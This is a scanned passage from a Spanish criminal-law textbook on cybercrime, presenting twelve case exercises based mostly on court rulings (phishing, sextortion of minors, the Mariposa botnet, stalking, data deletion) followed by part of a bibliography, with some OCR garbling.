
2. 7. Posibilidad de suspensión y sustitución de la penal


Tras la individualización de la pena se analizará si son aplicables los ins-
titutos de la suspensión y la sustitución de la misma, previstos en los artícu-
los 80 y ss. Cp.

2.8. Responsabilidad civil derivada de delito


El último apartado en la resolución de un caso práctico es el referido a la
responsabilidad civil ex delictum (esto es, derivada del delito cometido), y se
encuentra regulada en los arts. 109 y ss. CP. Simplemente se deberán reflejar
los responsables civiles por el hecho delictivo conforme a los preceptos in-
dicados, la posibilidad de restitución o reparación y, en su caso, una cuantía
aproximada para compensar a la víctima por los daños ocasionados por el
delito.
Ej. A2.12: Por vía de responsabilidad civil la acusada indemnizará la perju-
dicada Maprip, S.A.U en la cantidad de 16.789,55 €.

- 334 -
II. CASOS PRÁCTICOS

Caso N.1

Hechos probados:
l. Desde el año 2004 hasta el 2008, Roberto, mediante la utilización de pro-
gramas telemáticos, consiguió los datos de las tarjetas bancarias de múltiples per-
sonas, nacionales españoles y extranjeros, para lo cual enviaba correos masivos que
contenían la duplicación de páginas web de las entidades bancarias, a los que los des-
tinatarios contestaban facilitando sus datos personales y bancarios, lo que le permi-
tió realizar movimientos fraudulentos desde sus cuentas, sustrayendo el dinero.
2. Los programas informáticos necesarios para la obtención fraudulenta de
los datos (correos spam) al objeto de duplicar las páginas web oficiales de las en-
tidades bancarias (phising) fueron creados por Antonio, quien intervino con pleno
conocimiento del uso al que estaban destinados y cobró por transferencia a telefonía
móvil (hal cash) en el año 2007 un total de 35.110 euros.
3. Una vez que conseguía el dinero, Roberto utilizaba páginas dedicadas al mo-
vimiento de capitales y casinos virtuales, entre otras Moneybookers.com y LadBrokers.
com, situadas en países extranjeros y paraísos fiscales, desde donde, para dificultar
el seguimiento de los movimientos y ocultar el origen y rastro del dinero fraudulen-
tamente obtenido, lo transmitía a cuentas corrientes abiertas en España, donde solo
constaba la vinculación con la entidad extranjera y no la victima del fraude.
4. Las cuentas corrientes destinatarias estaban abiertas por indicación de Ro-
berto a su nombre o al de sus familiares, así el dinero era transferido a cuentas de su
madre Dª . Alicia, del novio de esta D. Carlos, de su tío D. Sergio, de su hermana Dª.
Llanos, del novio de esta D. Rafael, y de D. Jesús, persona ajena al círculo familiar de
aquel. Todos ellos con conocimiento de la mecánica delictiva procedían a disponer, en
beneficio propio o de aquel, de los importes ingresados en sus cuentas.
5. D. Jesús era titular de una cuenta en el BBVA (número NUM007 -que en-
tre 2004 y 2008 recibió transferencias fraudulentas por importe de 22.360,02 euros,
siendo reenviado 19.128,41 euros mediante movimientos a tarjetas virtuales y 1.180
euros el 8.2.2007 a una cuenta en Cajamar.
6. El perjuicio total causado por la utilización de tarjetas españolas asciende a
6 71.66 7 euros: La Caixa sufrió un perjuicio de 331.382,39 euros, Bankia de 11.240,43
euros y BBVA de 5.780,29 euros.
7. Los mencionados en este apartado han abonado la responsabilidad civil
que reclamaba Bankia (11.240,03 euros) y han ingresado 2.890 más 3.000 euros
para el pago parcial del resto de perjuicios."
Fuente: SAN de 18.02.2015.

- 335 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

CasoN. 2

Hechos probados:
"Que una persona identificada como María Inmaculada contactó a través de In-
ternet, primero con Heraclio (el día 2 de enero de 2014), y más tarde con su hermano
Indalecio y les hizo, sucesivamente, proposiciones de intercambio de fotos y videos
de carácter sexual, a las que uno y otro terminaron accediendo. Las víctimas enviaron
(a través de las redes sociales y, en especial, a través de Facebook) fotos de sus partes
íntimas, y recibieron a cambio otras fotos de similar contenido. En un momento de-
terminado, además de las fotos desnudos, la persona identificada como María Inma-
culada, les pidió a ambos hermanos que se tocasen entre ellos y que se hicieran una
felación, a lo que, finalmente accedieron y se registró un vídeo donde los hermanos,
desnudos, practicaban tal acto.
Cuando, posteriormente, los menores quisieron dejar de contactar con la refe-
rida María Inmaculada, esta les amenazó con enviar las fotografías y vídeos de ellos a
sus amigos si no continuaban haciendo lo que ella les pedía.
Los referidos hechos fueron denunciados el día 23 de febrero de 2014 por los
referidos hermanos lndalecio y Heraclio (de 13 y 12 años de edad), acompañados de
su padre.
Investigaciones posteriores acreditaron que el referido nombre María Inmacu-
lada fue introducido en la red por el acusado Baltasar. Asimismo, acreditaron que el
acusado, para comunicaciones por SKYPE se daba a conocer con el nombre de DI-
RECCION000, teniendo, además, un perfil en la red social Facebook con dicho nom-
bre. El usuario de dicho nombre y de su perfil, fue quien registró el nombre de María
Inmaculada y lo hizo, desde el correo electrónico DIRECCION00l. El referido usuario
de tales nombres y redes hacía las conexiones informáticas (IP) a través del teléfono
del que era titular y usuario exclusivo el acusado.
El acusado se dedicó, durante algún tiempo, a ser profesional de un videojuego
(red-Code.XF, "COUNTER STRIKE") por lo que tenía conocimientos en materia de in-
formática.
En los dispositivos intervenidos al acusado se encontraron archivos de conte-
nido pedófilo (pornografía infantil), habiendo sido compartidos dichos archivos con
otros usuarios de diversos chats."
Fuente: SAP Zaragoza (Sección Primera), de 07.11.2017

- 336 -
2. CASOS PRÁCTICO lUMBNBS

CasoN. 3

Hechos probados:

"Sergio, técnico informático de profesión, recibió en su ordenador un e-mail


de una empresa que se identificaba como Panamá Real State, que a cambio de una
cantidad de dinero le ofertó un trabajo consistente en ponerse en contacto con los
clientes que le fueran indicados, debiendo enviar dinero a Takijistán, concretamente
la cantidad de dos mil ciento diez (2.110) euros, de los que se quedaría con un cinco
por ciento (5%) de comisión, figurando la citada empresa según el mencionado acu-
sado en la página web www.panamainrt.com, la cual en la actualidad está prohibi-
da. Habiendo resultado infructuosas las gestiones para identificar a los responsables
de dicha página web, siendo ficticia la aludida empresa Panamá Real State, creada
para justificar las trasferencias de la cuentas de las víctimas a la que les habían sido
previamente usurpadas sus claves bancarias mediante distintos sistemas, como "los
troyanos", por los que se accede al ordenador de las víctimas con un programa apa-
rentemente inofensivo, pero que al ejecutarlo instala en el ordenador un segundo
programa que permite realizar intrusiones o ataques contra el ordenador afectado,
adquiriendo el "hacker" el control de dicho ordenador, pudiendo realizar acciones
como capturar los textos introducidos mediante el teclado, registrar las contraseñas
introducidas por el usuario o acceder a internet, siendo una variedad los denomina-
dos "trojan proxy", que proporcionan acceso anónimo a internet desde los equipos
de las víctimas, muy utilizados en la modalidad delictiva conocida como "phising",
sirviéndose los delincuentes del ordenador previamente infectado y a través de él
acceden a internet y realizan las órdenes de transferencias bancarias, dejando el ras-
tro de la dirección IP del ordenador infectado y no la original del delincuente. El 25-
08-10, a las 11.39 h., mediante la modalidad delictiva conocida como "phising", de la
cuenta-libreta estrella, de La Caixa, de María Virtudes y Gervasio, sin que los mismos
prestaran su consentimiento y consiguiente autorización, fue transferida la cantidad
de 2.110 euros, a la cuenta, también de La Caixa, de Segismundo, siendo el beneficia-
rio de la mencionada transferencia su hijo Sergio, quien previamente había facilitado
la numeración de la misma a la persona desconocida que le contactó en nombre de
la ficticia empresa Panamá Real State y a quien su citado padre, un día antes, había
incluido en la cuenta aludida como persona autorizada con firma reconocida, para
que tuviera acceso a la libreta de ahorro, así como a la clave para hacer operaciones
en el cajero automático, habiendo sido el mismo observado por personal de la enti-
dad bancaria, cuando se encontraba operando en el cajero automático, del que como
tope máximo podía sacar 600 euros, si bien por ventanilla podía ser extraído un tope
máximo de 3.000 euros, por lo que le manifestaron que no podía sacar dinero, pues la
cuenta había sido bloqueada por posible fraude.
Fuente: STS de 29/05/2014

- 337 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

Caso N.4

Alfonso había contactado a través de una red social con Estela, de 13 años, fa-
bricándose para ello una personalidad ficticia, simulando ser una chica, Laura, de 13
años, creando para ello un perfil falso que alimentó durante meses, con fotografías
y conversaciones, en las que fue ganándose la confianza de Estela. En un determi-
nado momento de la relación, Alfonso/Laura comenzó a hablar de sexo con Estela y
a contarle lo que "ella" les hacía a los chicos, y envió a Estela supuestas fotos de una
menor desnuda mostrando sus genitales diciéndole que era ella, y pidiendo a Estela
que hiciera lo mismo.
La madre de Estela, informada por su hija, se presentó con ella en la comisaría
para interponer una denuncia.
Los agentes hallaron en el móvil de la menor gran parte de las imágenes y ví-
deos de carácter sexual que Alfonso le había enviado. Los investigadores comproba-
ron que el titular de la línea telefónica era Alfonso, un hombre de 30 años residente
en Santander.
El detenido se ganaba la confianza de los menores a través de Internet con ob-
jeto de obtener fotografías u otros favores de índole sexual, llegando a las amenazas
cuando los menores se negaban. En el registro realizado se intervinieron equipos in-
formáticos, soportes digitales y dos teléfonos móviles en cuyas memorias se almace-
naban numerosos archivos y vídeos de pornografía infantil.
Fuente: Relato ficticio elaborado a partir de noticias periodísticas.

- 338 -
2. CASOS PRÁCTICO 1UM NES

Caso N. 5

Matías recopila en foros sociales imágenes de una mujer joven y atractiva, y con
ellas se crea un perfil falso: Verónica, para contactar con otros hombres en la Red, e
inicia una conversación en una web de chats con la siguiente frase: ¿Qué tal chicos, os
gustaría añadirme a vuestros contactos de Skype para chatear? A partir de ahí Ma-
tías envía imágenes en bikini de Verónica a los hombres que le contactan y después
ofrece enviar fotos más comprometidas a cambio de dinero. Matías en un primer
momento se había hecho con un paquete que incluía imágenes y vídeos que servi-
rán para componer la vida de la supuesta chica y escoge imágenes cotidianas pero
lo suficientemente sugerentes para aumentar la fantasía del usuario en relación con
su nueva amiga. Así, Matías se asegura de escribir cometiendo errores gramaticales,
usando emojis y otras formas de mensajes para emular a la chica ficticia y además,
para evadir que los usuarios encuentren las imágenes fácilmente, evitará el uso de
fotos reconocibles o saturadas. Un paquete de creación reciente es muy valioso para
Matías pues le permite engañar a tantas víctimas como pueda con el mismo perfil de
chica, de la que ofrece detalles como nombre, edad, aficiones, estudios y, sobre todo,
el motivo por el que necesita conseguir rápidamente una suma de dinero: se ha que-
dado sin trabajo y su casera le va a echar porque ella y su amiga deben ya tres meses
de alquiler. Roberto, creyendo que interactúa con Verónica, envía un primer pago a
Matías por unas cuantas imágenes enviadas mediante un vínculo a Dropbox. Una se-
mana después Roberto pide más fotos a Verónica, y Matías pide cantidades cada vez
más elevadas ofreciendo a Roberto, además de las fotos en las que ya no se ve la cara
de Verónica, pues las ha descargado de una página de pornografía, un encuentro se-
xual, que en realidad nunca se realizará. Matías además vende a terceros los paquetes
de fotos y videos que va elaborando y los tutoriales para estafar a otras personas.
Matías utiliza métodos de pago como Paypal y tarjetas de regalo de Amazon. Cuando
Roberto empieza a sospechar y pregunta a Verónica más datos, Matías le envía un
Cryptolocker en el enlace de las nuevas fotos y le pide un rescate por desencriptar
sus archivos. Cuando Roberto amenaza a Matías con denunciarle si no le devuelve
el dinero y libera sus archivos, Matías le amenaza con enviar las conversaciones que
han sostenido a amigos y conocidos.
Fuente: Relato ficticio elaborado a partir de noticias periodísticas.

- 339 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

CasoN.6

Hechos probados:
"Matijaz Skorkanc, identificado bajo el níckname de Iserdo, desarrolló el virus de-
nominado Mariposa. Dicho virus o código malicioso, a través de los dispositivos de alma-
cenamiento USB, programas de mensajería instantánea y redes de intercambio de datos,
se expandía de forma automática y secreta a otros sistemas informáticos y obstaculizaba
su funcionamiento, estando además diseñado para vigilar y controlar ordenadores y rea-
lizar ataques desde los mismos. Su novia, identificada como Nusha Coh, era la encargada
de recibir dinero por las diferentes entregas de virus y sus actualizaciones.
El acusado Alfonso, perteneciente al grupo de hackers conocido como DPP
Team, fue la persona responsable de la adquisición y actualización del virus, man-
teniendo contacto con Nusha Coh. Junto a él, José es la persona que accede a los pa-
neles de control de la red mariposa, siendo administrador de la misma junto a aquél
y, por último, el acusado Juan, mayor de edad y sin antecedentes en el momento de
los hechos, fue la persona que materialmente hizo la transferencia de dinero a Mati-
jaz Skorkanc por la compra del virus mediante su pago por transferencia de Western
Uníon hecha a la novia de aquél de 200 euros. Esta no fue la única venta, sino que Ma-
tijaz Skorkanc vendió su virus a los acusados al menos en siete ocasiones.
Una vez que el DPP Team dispuso del virus, dieron comienzo a su difusión y
a la infección masiva de ordenadores sirviéndose del virus, infestándose al menos
23.662 ordenadores, según informe pericial realizado sobre los discos duros incau-
tados, con un coste estimado de reparación de 3.300.000 euros, pudiendo llegar la
cifra hasta los diez millones de ordenadores en todo el mundo, normalmente, con la
finalidad de realizar ataques de denegación de servicios, que se realizaron, al menos,
a varias páginas web en España y, según informe del FBI, a las páginas de la empresa
canadiense Defense Intellígence, destruyendo toda su red y la de la Junta directiva de
la Escuela estatal de Ottawa, las Universidad de Ottawa, ministerios y organismo del
gobierno federal de Canadá y unas cien empresas en este país. La empresa Defense
Intellígence ha estimado los daños en 15.619,45 euros.
Finalmente, la comercial PANDA ANTIVIRUS supo de la existencia de esta botnet
al objeto de lograr el bloqueo y caída coordinada de la red, y a la identificación de sus
responsables, se estableció una acción coordinada a nivel internacional consistente
en: a) Reducción del TTL de los dominios; b) Bloqueo y eliminación de subdominios
utilizados para el control de la botnet; c) Obtención de datos de registro y acceso a los
subdominios investigados y relacionados con el control de la botnet.
Tras el análisis de la información, se determinó que el responsable de la botnet
se encontraba en España. Fruto de las investigaciones, se dio con el acusado Matijaz
Skorkanc y el resto de los miembros del DDP Team."
Fuente: SAN de 11.06.2015.

- 340 -
2. CASOS PRÁCTICOS D ruMENllS

CasoN. 7

Hechos probados:
"Matías, mayor de edad con antecedentes penales no cancelados por un delito
de stalking, procedió con fin de menoscabar gravemente la intimidad de Gregaria,
la que fue su pareja sentimental, a enviar, sin el consentimiento de esta, mediante
WhatsApp y mensajes SMS, al teléfono de Andrés, cuñado de aquélla, una serie de fo-
tografías y un video que mostraban imágenes que revelaban una relación sentimen-
tal entre ellos, lo cual no era conocido por el entorno familiar de Gregaria.
El acusado disponía de las fotografías bien por haber tomado algunas de ellas
directamente, bien por habérselas enviado telemáticamente su pareja Gregaria, y
reconoció haberlas reenviado sin su consentimiento, también por vía telemática, al
cuñado de aquélla, con la finalidad de que la familia de Gregaria se enterase de que
ella mantenía una relación sentimental con él, pues tal circunstancia era desconocida
para el entorno familiar, pues ella quería mantener en secreto dicha relación.
No se identificaron más allá de toda duda razonable qué concretas fotografías
de las obrantes habían sido realizadas por el acusado y qué otras lo fueron por su ex
pareja, con la única salvedad de una fotografía que la propia recurrente reconoció
haberse hecho a sí misma. Cabría sostener que, en cualquier caso, al menos algunas
fotos fueron captadas directamente por él.
Unas se tomaron en lugares públicos (al parecer, pues no se distingue con cla-
ridad, un bar o similar); en otras, aparecen el acusado y Gregaria dándose un beso o
simplemente mirando a la cámara mientras sonríen; otra, la capta la propia Gregaria,
fotografiándose con el bikini que le había regalado el recurrente, motivo por el que
se hizo la foto y se la mandó a aquél; en otra, la denunciante está vestida y tumbada
sobre una cama; en otra, la denunciante aparece sosteniendo una copa de cerveza en
la mano: las imágenes evidencian la existencia de una relación sentimental.
Fuente: SAP Barcelona (Sección Sexta) de 24.04.2017.

- 341 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

CasoN. 8

Hechos probados:
"Ascensión, mayor de edad y sin antecedentes penales, trabajaba como agente co-
mercial para la empresa de seguros Accidentes+. La empresa tiene una base de datos
informática conectada a todos los ordenadores de los empleados, de modo que cada
uno de ellos pueda realizar anotaciones y modificaciones en el listado de clientes desde
sus terminales, siempre y cuando acredite sus claves de acceso y seguridad. Ascensión
tenía asignada a Alicia como técnico informático, subcontratada por la empresa Acci-
dentes+ y, por tanto, vinculada económicamente a la misma por un contrato de mante-
nimiento. El trabajo de Alicia consistía en servir de asistencia a nivel informático para
varios de los empleados de Accidentes+, entre ellos, la acusada Ascensión.
Ascensión había manifestado a su jefe su intención de marcharse de la empre-
sa y de "no hacerlo con las manos vacías" como le dijo literalmente al dueño de la
empresa, Roberto, el cual le replicó que se iba voluntariamente y no tenía por tanto
derecho a indemnización.
Alicia declaró que la empresa la avisó de la desaparición de una serie de archivos
informáticos, verificando que esta información fue borrada desde el usuario "comer-
cial l" correspondiente a Ascensión y lo fue de forma voluntaria dado que se produce
una supresión de todos los ficheros que no se dejan en la papelera del ordenador, sino
que se eliminan también expresamente de esta última bandeja en la que quedan por
defecto. Aseguró que se habían modificado archivos que luego se habían suprimido y
ya no hubo más entradas desde ese usuario en el ordenador. El borrado se descubrió
gracias a una trabajadora de la misma empresa que entró con el usuario de Ascensión,
ante su ausencia en la empresa por haberse marchado sólo unos días antes y siendo
necesario realizar algún trámite dentro de sus funciones. El borrado, sin embargo, se
produjo cuando Ascensión aún formaba parte de la plantilla de trabajadores en activo.
Ascensión borró todos los archivos informáticos sobre sus clientes, muchos de los cuales
solo conocía ella según explicó el Sr. Roberto dado que si no habían generado un pedido o
algún presupuesto previo no eran conocidos en la empresa más que por el comercial que
negociaba con ellos; es decir que se depositaba en los comerciales una gran confianza y
responsabilidad y, por tanto, ello supuso que la empresa perdió todas las ventas que hu-
biese podido realizar con los clientes con los que solo ella sabía que trabajaba.
Según un informe pericial aportado por la empresa Accidentes+ se calcula el
lucro cesante, lo que la empresa para la que aquella trabajaba ha dejado de ganar
por su marcha, y lo cifra en dos meses de facturación (3000 euros) que su sucesora
no pudo trabajar porque no tenía los archivos de aquella y, en consecuencia, no pudo
continuar con los proyectos que aquella hubiera ya iniciado".
Fuente: SAP Barcelona (Sección Séptima) de 28.10.2016.

- 342 -
2. CASOS PRÁCTICOS DE CI R Rf.MENES

CasoN. 9

Hechos probados:
"Dulce conoció a Gabino, mayor de edad y sin antecedentes penales, y ambos
compartieron algunos mensajes vía WhatsApp por estar en la misma escuela de surf,
tras lo cual, ante los numerosos mensajes por esta vía remitidos por Gabino, Dulce
pidió a este que dejara de mandarle mensajes. Con posterioridad a ello, Gabino con-
tinuó con el envío de multitud de mensajes al teléfono móvil de Dulce e incontables
llamadas telefónicas tanto a ese terminal como su teléfono fijo a todas horas del día y
de la noche, con insistencia en que le contestase, llegando a enviar mensajes de voz,
con reclamación de que acudiera con él a una endoscopia e incluso conocer a su hijo.
Asimismo, Gabino contactó con la familia de Dulce para decirles que mantenía una
relación sentimental con ella al tiempo que pidió a conocidos comunes de ambos que
le ayudaran a tener una relación sentimental con Dulce. Además de ello, en esos mis-
mos días, Gabino acudió todas las mañanas al centro de trabajo de Dulce y permane-
cía en sus inmediaciones con el fin de vigilarla y controlar sus horarios. El acusado se
presentó en el centro de trabajo de Dulce con el fin de esperar que llegara, y tras pe-
dirle nuevamente esta que se marchara y dejara de controlar su vida, Gabino le con-
testó que no se iba a marchar pues su deseo era estar con ella y que iba a continuar
buscándola siempre. Pese a que Dulce solicitó en reiteradas ocasiones a Gabino que
le dejara, hubo de modificar sus horarios, tomar más precauciones por la seguridad
de su hijo, dejar de asistir a la escuela de surf, bloquear sus teléfonos o redes sociales,
así como ver mermado su sosiego ante la continua presencia del acusado en su lugar
de trabajo con el fin de vigilarla".
Fuente: SAP Granada (Sección Primera) de 10.03.2017.

- 343 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

Caso N.10

Hechos probados:
"Los acusados Eulogio y Inocencio, el primero administrador único y el segun-
do socio de la mercantil Mito Comunicación SL, actuando en ejecución de un plan
común previo acuerdo, acudieron a la Iglesia Santa María del Castillo, en la que se es-
taba realizando la exposición "Vestigia: la Leyenda del Camino", con el patrocinio de
la Fundación Santa María del Castillo y, con ánimo de menoscabar la propiedad ajena,
el acusado Inocencio entró en la sala de control donde se encontraba la instalación
informática que la mercantil de los acusados había montado junto con todo el siste-
ma audiovisual necesario existente en las distintas salas, y sustituyó varias tarjetas
de memoria que contenían archivos de audio e imagen, necesarios para proyectar
la exposición por otras tarjetas de memoria que no proyectaban correctamente la
misma de modo que resultaba imposible seguir la proyección. A consecuencia de ello,
la exposición se interrumpió durante más de seis meses toda vez que los acusados
no entregaron las tarjetas necesarias para proyectar la exposición en el modo que se
había diseñado y contratado por las partes, la Fundación Santa María del Castillo y la
mercantil Mito Comunicación SL".
Fuente: SAP Palencia (Sección Primera) de 14.07.2016.

- 344 -
2. CASOS PRÁCTICOS DE cm RCRíMENES

Caso N.11

Hechos probados:
"Florián, administrador de la sociedad mercantil IMAGINA LABS S.L. y Ruperto,
suscribieron un contrato de licencia de uso del software 'Tapcities", propiedad del
primero, adecuado para desarrollar la aplicación diseñada por el segundo llamada
"Alicante Info", que estaría disponible para su descarga a través de Google Play, para
sistema Android y en App Apple Store para Iphones.
En los meses sucesivos se llegaron a realizar 13.700 descargas de dicha apli-
cación, que no fueron consideradas suficientes por Florián y, a iniciativa de este, las
partes decidieron no renovar el contrato de licencia.
Ruperto desarrolló una nueva aplicación con un contenido mejorado y adquirió
otro software, mientras que Florián continuó recibiendo a través del viejo software
de su propiedad descargas en busca de la aplicación Alicante Info que desvió median-
te una actualización a una aplicación de su propiedad denominada "Now Alicante"
con parecida temática a la anterior.
Las partes discuten si, de acuerdo con las cláusulas del contrato y las posibili-
dades técnicas estas descargas podían y debían haber sido transferidas a la nueva
aplicación de Ruperto o, por el contrario, corría a cargo de este lograr por sus propios
medios la atención de los clientes hacia la misma. Igualmente, las partes discuten so-
bre la cuantía del perjuicio padecido en todo caso por Ruperto, de difícil constatación
al basarse las ganancias en la publicidad desplegada y afirmar el acusado Florián que
los anunciantes de Now Alicante eran también nuevos.
Fuente: SAP Valencia (Sección Cuarta) de 21.09 .2016.

- 345 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

CasoN.12

Hechos probados:
"Damián contactó a través de un chat con Maribel y, tras haber conseguido apo-
derarse subrepticiamente mediante herramientas informáticas que conocía y de las
que disponía, de archivos personales privados de Maribel en los que ella aparecía
desnuda o desarrollando conductas de contenido sexual. Posteriormente, aprovechó
la posición de poder que ello le proporcionaba y atemorizando a Maribel al advertirle
que podía difundirlos y causarle con ello un gran perjuicio, logrando que ella admi-
tiera, durante un prolongado periodo de tiempo mantener contactos con él, a través
de un programa de mensajería instantánea. Con ocasión de dichos contactos, en los
que él veía a Maribel en directo a través de una web-cam, ella desarrollaba conductas
de contenido sexual -se desnudaba, se masturbaba, etc.- a petición de Damián, para
satisfacer sus pretensiones libidinosas".
Fuente: STS de 23.07.2018.

- 346 -
Bibliografta
ABoso, G. E. (2017). Derecho penal cibernético. La cibercriminalidad y el Derecho penal
en la moderna sociedad de la información y la tecnología de la comunicación.
Buenos Aires, BdeF.
AGUAS BALSERA, J. (2010). "El peritaje en informática en el marco de las disciplinas que
le son afines. Puntos de contacto y perfil de la actividad", Diario La Ley, 7329,
edición digital.
AGUILAR GARclA, MA. (Dir.) et al. (2015 ).Manual práctico para la investigación y enjuiciamiento
de delitos de odio y discriminación. Generalitat de Catalunya, Barcelona.
AGUSTINA, J. R. (2015). "Understanding Cyber Victimization: Digital Architectures and
the Disinhibition Effect", International Journal of Cyber Criminology 9 ( 1), 3 5-54.
AGUSTINA, J.R. & GóMEZ-DURAN, E. (2016). "Factores de riesgo asociados al sexting
como umbral de diversas formas de victimización Estudio de factores
correlacionados con el sexting en una muestra universitaria", IDP Revista de los
Estudios de Derecho y Ciencia Política, 22, pp. 32-58.
ALASTUEY DoBóN, C. (2016). "Discurso del odio y negacionismo en la reforma del Código
Penal de 2015", Revista Electrónica de Ciencia Penal y Criminología, 18-14,
disponible en: http://criminet.ugr.es/recpc/l8/recpc18- 14.pdf
ALCACER GmRAO, Rafael (2012). "Derecho a la intimidad, investigación policial y acceso
a un ordenador personal (Comentario a la STC 173/2011, de 7 de noviembre)",
La Ley Penal, 92, edición digital.
ALONSO DE EscAMILLA, A. (2013). "El delito de Stalking como nueva forma de acoso", La
Ley Penal, 105, edición digital.
ALONSO RrMo, A.(2010) . "Apología, enaltecimiento del terrorismo y principios penales",
Revista de Derecho penal y Criminología, 4., pp. 13-80.
ALONSO RrMo, A. (2015). "Los nuevos delitos de ¿desórdenes? ¿públicos? Especial
referencia a los tipos de incitación o de refuerzo de la disposición a delinquir
(art. 557.2 y 559 CP)", Estudios Penales y Criminológicos, 35, pp. 359-412.

- 349 -
Bibliografía

ALONSO-Rumo, P., RooRíGUEZ·CASTRO, Y., PÉREZ·ANDRÉ, C. & JosÉ-MAGALHAES, M. (2015) .


"Estudio cualitativo en un grupo de estudiantes ourensanos/as sobre el
fenómeno del Sexting", Revista de Estudios e Investigación en Psicología y
Educación, Vol. Extr., 13, edición digital.
ANDRÉS DoMINGUEZ, (2015). "Art. 264", en Manuel Gómez Tomillo (dir.) Comentarios
prácticos al Código penal, vol. 3, Thomson Reuters Aranzadi.
ANGUITA OSUNA, J. E. (2018). "Análisis histórico-jurídico de la lucha contra la
ciberdelincuencia en la Unión Europea", Revista de Estudios en Seguridad
Internacional 4( 1), pp. 107-126.
ARMENTA Dw, T. (2018). "Regulación legal y valoración probatoria de fuentes de prueba
digital (correos electrónicos, WhatsApp, redes sociales) : entre la insuficiencia
y la incertidumbre", IDP Revista de Internet, Derecho y Política, 27, pp. 67-79.
BARRIO ANDRÉS, M. (2018) . Delitos 2.0 Aspectos penales, procesales y de seguridad de los
ciberdelitos. Wolters Kluwer, Madrid.
BENsoN, M. & SIMPSON, S. (2009). White collar crime: an opportunity perspective.
Routledge, London.
BEQUAI, A. ( 1978). Computer Crime, Massachussetts, Lexington Books.
BERGUER, A., PATCHIN J.W., & HINDUJA S. (2015). Cyberbullying Prevention and Response.
Expert Perspectives. Routledge, New York.
BERNAL DEL CASTILLO, J. (2014). "Política Criminal en España y discriminación xenófoba:
la centralidad de los delitos de provocación a la discriminación", Política
Criminal: Revista Electrónica Semestral de Políticas Públicas en Materias
Penales, Vol. 9, 18, edición digital.
BERNAL DEL CASTILLO, J. (2016) . "El enaltecimiento del terrorismo y la humillación a
sus víctimas como formas del "discurso del odio'"' Revista de Derecho penal y
Criminología, 16, pp. 13-43.
BERNAL DEL CASTILLO, J. (2016) . "La justificación y enaltecimiento del genocidio en la
Reforma del Código Penal de 2015", InDret, 2, edición digital.
BERNAL DEL CASTILLO, J. (2017) . "Actos preparatorios y provocación al terrorismo",
Cuadernos de Política Criminal, 122, pp. 5-46.
BoRGES BLAzQUEZ, R. (2018). "La prueba electrónica en el proceso penal y el valor
probatorio de conversaciones mantenidas utilizando programas de mensajería
instantánea", Rev. Boliv. de Derecho, 25, pp. 536-549.
BROWN, N. & SANDHOLM, T. (2019). "Superhuman Al for multiplayer poker", Science 11
July 2019. DOI: 10.1126/science.aay2400. Disponible en: https://science.
sciencemag. org/ content/early/2019 /0 7/ 10 /science. aay2400
BUENO DE MATA, F. (2014). "Sentencia del Tribunal Supremo (Sala de lo Penal, Sección
1ª ), de 19 de mayo de 2015. Acerca de la validez de los pantallazos como
prueba electrónica enjuicio", Ars Iuris Salmanticensis, 3, pp. 322-324.
BuENo DE MATA, F. (2014). Prueba electrónica y proceso 2.0. Tirant Lo Blanch, Valencia.

- 350 -
Bibllografla

CABEZUDO RODRÍGUEZ, N. (2016). "Ciberdelincuen ia Investigación criminal. Las nuevas


medidas de investigación tecnológica en la Ley de Enjuiciamiento Criminal",
Boletín del Ministerio de Justicia, 2186, pp. 7-60.
CADENA SERRANO, F.A. (2019). "Delito de colaboración con organización terrorista
(Yihadista)", Diario La Ley, 9466, edición digital.
CALLE RODRÍGUEZ, M.V. (2007). "El delito de estafa informática", La Ley Penal, 37, edición
digital.
CAMARA ARROYO, S. (2015) . Apuntes de delincuencia y criminología juvenil: adaptados a
la docencia del Plan Bolonia. UNIR. Logroño.
CAMARA ARROYO, S. (2016). "Las primeras condenas en España por stalking: cuestiones
penales y criminológicas del nuevo delito de acecho o acoso predatorio", La
Ley Penal, 121, edición digital.
CAMARA ARROYO, S. (2018). "Delitos de odio: concepto y crítica: ¿límite legítimo a la
libertad de expresión?", La Ley Penal, 130, edición digital.
CAMARA ARROYO, S. (2018). "El concepto de delitos de odio y su comisión a través del
discurso: especial referencia al conflicto con la libertad de expresión", Anuario
de Derecho penal y Ciencias penales, Tomo 70, Fase/Mes 1, pp. 139-225.
CANO PAÑOS, M.A. (2016). "Odio e incitación a la violencia en el contexto del terrorismo
islamista. Internet como elemento Ambiental", InDret, 4, edición digital.
CANO, J. (2006). "Introducción a la informática forense", Sistemas, pp. 64-73.
CANO, J. (2006). Estado del arte del peritaje informático en Latinoamérica. Alfa-REDI.
Disponible en: http://www.alfa-redi.org/ar-dnt-documento.shtml?x=728
CANO, J.(2009). Computación forense - Descubriendo los rastros informáticos.
Almaomega, Madrid.
CARRASCO MAYANS, S. (2016). "La alegalidad o limbo legal de la prueba electrónica", en
OLIVA LEóN, R. f.1 VALERO BARCELó, S. (Coords.). La prueba electrónica. Validez y
eficacia procesal. Juristas con Futuro, Zaragoza.
CASTRO TOLEDO, F. J. f:f M!Ró LL1NARES, F. (2018). ¿Nos parecen más inseguros los
ciberlugares después de un ciberataque?, International E-Journal of Criminal
Sciences núm. 12, Artículo 1, pp. 1-25. Disponible en: http://www.ehu.eus/ojs/
index.php/inecs/article/view /19689/17541.
CENTRO INTERNACIONAL PARA LA PREVENCIÓN DE LA CRIMINALIDAD (2018). VI Informe
internacional sobre la prevención de la criminalidad y la seguridad cotidiana:
prevenir la ciberdelincuencia. CIPC, Montreal (Canadá).
CHIESA, R., DuCCI, S f:f C1APPI, S. (2009). Profiling hackers: the science of criminal profiling
as applied to the world of hacking. Auerbach Publications Taylor f.1 Francis
Group, Boca Raton (Florida).
CHor, K.S. (2015 ). Cybercriminology and Digital Investigation. LFB Scholarly Publishing
LLC, El Paso (Texas).

- 351 -
Bibliografta

CHOJ J(.. ', orr T.M., LE LAIR D.P. (2016). "Ransomware Against Police: Diagnosis of
l l k Factors vía pllcation of Cyber-Routine Activities Theory", International
Jou rnal ofForen le Science & Pathology, 4(7), pp. 253-258.
1, .S. & ToRo-.ktVA z, M.M. (2017) . Cibercriminología. Guía para la investigación
